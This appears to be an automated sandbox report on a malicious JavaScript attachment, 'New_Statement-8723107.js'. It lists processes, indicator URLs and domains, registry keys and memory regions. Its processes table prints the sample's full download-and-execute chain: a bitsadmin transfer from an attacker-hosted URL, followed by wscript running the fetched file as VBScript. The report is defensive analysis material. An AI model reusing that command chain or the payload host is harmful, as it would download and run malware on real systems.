Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
New_Statement-8723107.js
|
Unicode text, UTF-8 text, with very long lines (6942), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x2021eb5d, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js"
|
|
|
|
C:\Windows\System32\bitsadmin.exe
|
"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110
C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110
|
unknown
|
|
|
|
https://aeroox.000webhostapp.com/dov/010111100110101
|
unknown
|
|
|
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110ttC:
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://aeroox.000webhostapp.com:443/dov/010111100110101101001111111101011011100101011110
|
unknown
|
||
|
https://aeroox.000webhostapp.com/dov/0101111001101011010011111111010110111001010111101C:
|
unknown
|
||
|
https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110C:
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
aeroox.000webhostapp.com
|
unknown
|
|
|
|
us-east-1.route-1.000webhost.awex.io
|
145.14.145.39
|
||
|
171.39.242.20.in-addr.arpa
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
145.14.145.39
|
us-east-1.route-1.000webhost.awex.io
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
20424D9A000
|
heap
|
page read and write
|
||
|
207FC830000
|
trusted library allocation
|
page read and write
|
||
|
204230E5000
|
heap
|
page read and write
|
||
|
20423153000
|
heap
|
page read and write
|
||
|
1BF576F3000
|
heap
|
page read and write
|
||
|
207FC906000
|
heap
|
page read and write
|
||
|
66C71FB000
|
stack
|
page read and write
|
||
|
66C5FFB000
|
stack
|
page read and write
|
||
|
207FC8C5000
|
heap
|
page read and write
|
||
|
207F7B0C000
|
heap
|
page read and write
|
||
|
66C647E000
|
stack
|
page read and write
|
||
|
66C6AFE000
|
unkown
|
page readonly
|
||
|
20423124000
|
heap
|
page read and write
|
||
|
207F8100000
|
trusted library section
|
page readonly
|
||
|
207F7328000
|
heap
|
page read and write
|
||
|
20423035000
|
heap
|
page read and write
|
||
|
207FC8C2000
|
heap
|
page read and write
|
||
|
A8016FF000
|
stack
|
page read and write
|
||
|
20422EF0000
|
heap
|
page read and write
|
||
|
1BF5769D000
|
heap
|
page read and write
|
||
|
B86C3FF000
|
stack
|
page read and write
|
||
|
66C58FE000
|
unkown
|
page readonly
|
||
|
1BF5ACC0000
|
trusted library allocation
|
page read and write
|
||
|
204230ED000
|
heap
|
page read and write
|
||
|
1BF57708000
|
heap
|
page read and write
|
||
|
1BF576DC000
|
heap
|
page read and write
|
||
|
66C70FE000
|
unkown
|
page readonly
|
||
|
1BF576E2000
|
heap
|
page read and write
|
||
|
1BF576F3000
|
heap
|
page read and write
|
||
|
66C7C7E000
|
stack
|
page read and write
|
||
|
1BF575C0000
|
heap
|
page read and write
|
||
|
207F80E0000
|
trusted library section
|
page readonly
|
||
|
207F7313000
|
heap
|
page read and write
|
||
|
59C3078000
|
stack
|
page read and write
|
||
|
207F7B00000
|
heap
|
page read and write
|
||
|
66C61FB000
|
stack
|
page read and write
|
||
|
207FC80E000
|
heap
|
page read and write
|
||
|
207F80C0000
|
trusted library section
|
page readonly
|
||
|
1BF59024000
|
heap
|
page read and write
|
||
|
66C547B000
|
stack
|
page read and write
|
||
|
207F7240000
|
heap
|
page read and write
|
||
|
2042314C000
|
heap
|
page read and write
|
||
|
66C6FFE000
|
stack
|
page read and write
|
||
|
B86C1FE000
|
stack
|
page read and write
|
||
|
66C677E000
|
stack
|
page read and write
|
||
|
66C6CFE000
|
stack
|
page read and write
|
||
|
204230C0000
|
heap
|
page read and write
|
||
|
66C5CFE000
|
unkown
|
page readonly
|
||
|
20423099000
|
heap
|
page read and write
|
||
|
207FC650000
|
trusted library allocation
|
page read and write
|
||
|
66C5DFC000
|
stack
|
page read and write
|
||
|
207F7B13000
|
heap
|
page read and write
|
||
|
207FC724000
|
trusted library allocation
|
page read and write
|
||
|
66C6DFE000
|
unkown
|
page readonly
|
||
|
20423102000
|
heap
|
page read and write
|
||
|
207F8621000
|
trusted library allocation
|
page read and write
|
||
|
66C73FC000
|
stack
|
page read and write
|
||
|
204230FD000
|
heap
|
page read and write
|
||
|
207FC85B000
|
heap
|
page read and write
|
||
|
A8010FE000
|
stack
|
page read and write
|
||
|
204230ED000
|
heap
|
page read and write
|
||
|
207F7F40000
|
trusted library allocation
|
page read and write
|
||
|
207F726F000
|
heap
|
page read and write
|
||
|
20423124000
|
heap
|
page read and write
|
||
|
1BF576F3000
|
heap
|
page read and write
|
||
|
207FC7C0000
|
trusted library allocation
|
page read and write
|
||
|
207FC7B0000
|
trusted library allocation
|
page read and write
|
||
|
204230E1000
|
heap
|
page read and write
|
||
|
1BF576DA000
|
heap
|
page read and write
|
||
|
20423124000
|
heap
|
page read and write
|
||
|
204230FA000
|
heap
|
page read and write
|
||
|
1BF576CF000
|
heap
|
page read and write
|
||
|
A8019FC000
|
stack
|
page read and write
|
||
|
207FC84C000
|
heap
|
page read and write
|
||
|
66C6EFE000
|
unkown
|
page readonly
|
||
|
207F72B5000
|
heap
|
page read and write
|
||
|
204230D1000
|
heap
|
page read and write
|
||
|
2042314A000
|
heap
|
page read and write
|
||
|
20424DA2000
|
heap
|
page read and write
|
||
|
66C57F7000
|
stack
|
page read and write
|
||
|
2042314A000
|
heap
|
page read and write
|
||
|
207F80D0000
|
trusted library section
|
page readonly
|
||
|
1BF576EB000
|
heap
|
page read and write
|
||
|
66C6BFE000
|
unkown
|
page readonly
|
||
|
207F7120000
|
heap
|
page read and write
|
||
|
207F7A15000
|
heap
|
page read and write
|
||
|
191D1F35000
|
heap
|
page read and write
|
||
|
20423104000
|
heap
|
page read and write
|
||
|
207FC7B0000
|
trusted library allocation
|
page read and write
|
||
|
204230C0000
|
heap
|
page read and write
|
||
|
191D1B70000
|
heap
|
page read and write
|
||
|
66C74FE000
|
unkown
|
page readonly
|
||
|
207F72AB000
|
heap
|
page read and write
|
||
|
207F80F0000
|
trusted library section
|
page readonly
|
||
|
66C687E000
|
stack
|
page read and write
|
||
|
207FC840000
|
trusted library allocation
|
page read and write
|
||
|
207FC81E000
|
heap
|
page read and write
|
||
|
207F7291000
|
heap
|
page read and write
|
||
|
207FCA10000
|
trusted library allocation
|
page read and write
|
||
|
66C6B7E000
|
stack
|
page read and write
|
||
|
66C69FB000
|
stack
|
page read and write
|
||
|
207F722B000
|
heap
|
page read and write
|
||
|
207FC82B000
|
heap
|
page read and write
|
||
|
1BF576CA000
|
heap
|
page read and write
|
||
|
207F729C000
|
heap
|
page read and write
|
||
|
207FC720000
|
trusted library allocation
|
page read and write
|
||
|
66C5BFC000
|
stack
|
page read and write
|
||
|
66C657E000
|
stack
|
page read and write
|
||
|
66C6E7E000
|
stack
|
page read and write
|
||
|
20424D90000
|
heap
|
page read and write
|
||
|
207FC6E0000
|
trusted library allocation
|
page read and write
|
||
|
204230ED000
|
heap
|
page read and write
|
||
|
20423040000
|
heap
|
page read and write
|
||
|
20423106000
|
heap
|
page read and write
|
||
|
20423116000
|
heap
|
page read and write
|
||
|
207FC710000
|
trusted library allocation
|
page read and write
|
||
|
20423038000
|
heap
|
page read and write
|
||
|
2042314D000
|
heap
|
page read and write
|
||
|
207FC83F000
|
heap
|
page read and write
|
||
|
207F7B02000
|
heap
|
page read and write
|
||
|
20423107000
|
heap
|
page read and write
|
||
|
207F8650000
|
trusted library allocation
|
page read and write
|
||
|
20423151000
|
heap
|
page read and write
|
||
|
20423100000
|
heap
|
page read and write
|
||
|
204230D4000
|
heap
|
page read and write
|
||
|
207FC6D0000
|
trusted library allocation
|
page read and write
|
||
|
B86C0FA000
|
stack
|
page read and write
|
||
|
207FC8C0000
|
heap
|
page read and write
|
||
|
1BF576DE000
|
heap
|
page read and write
|
||
|
A8018FE000
|
stack
|
page read and write
|
||
|
207F7213000
|
heap
|
page read and write
|
||
|
A8017FE000
|
stack
|
page read and write
|
||
|
207F72A2000
|
heap
|
page read and write
|
||
|
1BF574E0000
|
heap
|
page read and write
|
||
|
207FC884000
|
heap
|
page read and write
|
||
|
66C59FE000
|
stack
|
page read and write
|
||
|
207FCA30000
|
trusted library allocation
|
page read and write
|
||
|
A8013FE000
|
stack
|
page read and write
|
||
|
207FC6C0000
|
trusted library allocation
|
page read and write
|
||
|
66C637E000
|
stack
|
page read and write
|
||
|
207FC660000
|
trusted library allocation
|
page read and write
|
||
|
207FCA50000
|
trusted library allocation
|
page read and write
|
||
|
66C64FE000
|
unkown
|
page readonly
|
||
|
207FC862000
|
heap
|
page read and write
|
||
|
191D1CB0000
|
heap
|
page read and write
|
||
|
1BF57708000
|
heap
|
page read and write
|
||
|
207FC700000
|
trusted library allocation
|
page read and write
|
||
|
207F72FD000
|
heap
|
page read and write
|
||
|
20424DA3000
|
heap
|
page read and write
|
||
|
66C60FE000
|
unkown
|
page readonly
|
||
|
66C65FE000
|
unkown
|
page readonly
|
||
|
1BF576E2000
|
heap
|
page read and write
|
||
|
207FC6E1000
|
trusted library allocation
|
page read and write
|
||
|
207FC8BD000
|
heap
|
page read and write
|
||
|
2042314A000
|
heap
|
page read and write
|
||
|
1BF59020000
|
heap
|
page read and write
|
||
|
207FCA80000
|
remote allocation
|
page read and write
|
||
|
207F7274000
|
heap
|
page read and write
|
||
|
1BF575E0000
|
heap
|
page read and write
|
||
|
59C337E000
|
stack
|
page read and write
|
||
|
207F7B1A000
|
heap
|
page read and write
|
||
|
207FC904000
|
heap
|
page read and write
|
||
|
207F7100000
|
heap
|
page read and write
|
||
|
207FC6E5000
|
trusted library allocation
|
page read and write
|
||
|
59C32FE000
|
stack
|
page read and write
|
||
|
207FC855000
|
heap
|
page read and write
|
||
|
66C67FE000
|
unkown
|
page readonly
|
||
|
191D1F30000
|
heap
|
page read and write
|
||
|
1BF58F50000
|
heap
|
page read and write
|
||
|
207F7277000
|
heap
|
page read and write
|
||
|
2042310B000
|
heap
|
page read and write
|
||
|
A8014FF000
|
stack
|
page read and write
|
||
|
207F7C01000
|
trusted library allocation
|
page read and write
|
||
|
191D1C70000
|
heap
|
page read and write
|
||
|
1BF576C1000
|
heap
|
page read and write
|
||
|
1BF5B4C0000
|
heap
|
page read and write
|
||
|
20422FD0000
|
heap
|
page read and write
|
||
|
66C7CFE000
|
unkown
|
page readonly
|
||
|
59C327E000
|
stack
|
page read and write
|
||
|
1BF576D6000
|
heap
|
page read and write
|
||
|
2042314A000
|
heap
|
page read and write
|
||
|
1BF576E2000
|
heap
|
page read and write
|
||
|
59C31FE000
|
stack
|
page read and write
|
||
|
A8011FE000
|
stack
|
page read and write
|
||
|
207F7890000
|
trusted library allocation
|
page read and write
|
||
|
207F7302000
|
heap
|
page read and write
|
||
|
1BF576BD000
|
heap
|
page read and write
|
||
|
204230BF000
|
heap
|
page read and write
|
||
|
1BF576CE000
|
heap
|
page read and write
|
||
|
207FC816000
|
heap
|
page read and write
|
||
|
20423124000
|
heap
|
page read and write
|
||
|
207FC8F6000
|
heap
|
page read and write
|
||
|
207F80B0000
|
trusted library section
|
page readonly
|
||
|
191D1C50000
|
heap
|
page read and write
|
||
|
66C5AFE000
|
unkown
|
page readonly
|
||
|
1BF576F3000
|
heap
|
page read and write
|
||
|
20422FF0000
|
heap
|
page read and write
|
||
|
20424D9B000
|
heap
|
page read and write
|
||
|
2042310D000
|
heap
|
page read and write
|
||
|
191D1D28000
|
heap
|
page read and write
|
||
|
1BF576A0000
|
heap
|
page read and write
|
||
|
1BF576C9000
|
heap
|
page read and write
|
||
|
207FC8A4000
|
heap
|
page read and write
|
||
|
207FC90E000
|
heap
|
page read and write
|
||
|
1BF57708000
|
heap
|
page read and write
|
||
|
1BF576DC000
|
heap
|
page read and write
|
||
|
207FCA80000
|
remote allocation
|
page read and write
|
||
|
207F7400000
|
heap
|
page read and write
|
||
|
207FC6E0000
|
trusted library allocation
|
page read and write
|
||
|
20423117000
|
heap
|
page read and write
|
||
|
204230FA000
|
heap
|
page read and write
|
||
|
20423101000
|
heap
|
page read and write
|
||
|
2042303B000
|
heap
|
page read and write
|
||
|
207F7200000
|
heap
|
page read and write
|
||
|
A800D4A000
|
stack
|
page read and write
|
||
|
207F725B000
|
heap
|
page read and write
|
||
|
1BF57695000
|
heap
|
page read and write
|
||
|
204230F7000
|
heap
|
page read and write
|
||
|
207F7A00000
|
heap
|
page read and write
|
||
|
1BF576DC000
|
heap
|
page read and write
|
||
|
207F7A02000
|
heap
|
page read and write
|
||
|
207FC800000
|
heap
|
page read and write
|
||
|
207FC710000
|
trusted library allocation
|
page read and write
|
||
|
20423090000
|
heap
|
page read and write
|
||
|
207F72BA000
|
heap
|
page read and write
|
||
|
66C63FE000
|
unkown
|
page readonly
|
||
|
207FC73E000
|
trusted library allocation
|
page read and write
|
||
|
B86C2FE000
|
stack
|
page read and write
|
||
|
66C72FE000
|
unkown
|
page readonly
|
||
|
1BF576D6000
|
heap
|
page read and write
|
||
|
207F79A0000
|
trusted library section
|
page read and write
|
||
|
207F728A000
|
heap
|
page read and write
|
||
|
207FC902000
|
heap
|
page read and write
|
||
|
1BF576E2000
|
heap
|
page read and write
|
||
|
20423030000
|
heap
|
page read and write
|
||
|
204230FC000
|
heap
|
page read and write
|
||
|
1BF576D6000
|
heap
|
page read and write
|
||
|
66C68FE000
|
unkown
|
page readonly
|
||
|
207F7279000
|
heap
|
page read and write
|
||
|
1BF57690000
|
heap
|
page read and write
|
||
|
66C5EFE000
|
unkown
|
page readonly
|
||
|
207FCA80000
|
remote allocation
|
page read and write
|
||
|
204230FA000
|
heap
|
page read and write
|
||
|
20424D91000
|
heap
|
page read and write
|
||
|
207FCA20000
|
trusted library allocation
|
page read and write
|
||
|
66C62FE000
|
unkown
|
page readonly
|
||
|
207F8200000
|
trusted library allocation
|
page read and write
|
||
|
191D1D20000
|
heap
|
page read and write
|
||
|
207FC900000
|
heap
|
page read and write
|
||
|
1BF576DC000
|
heap
|
page read and write
|
There are 240 hidden memdumps, click here to show them.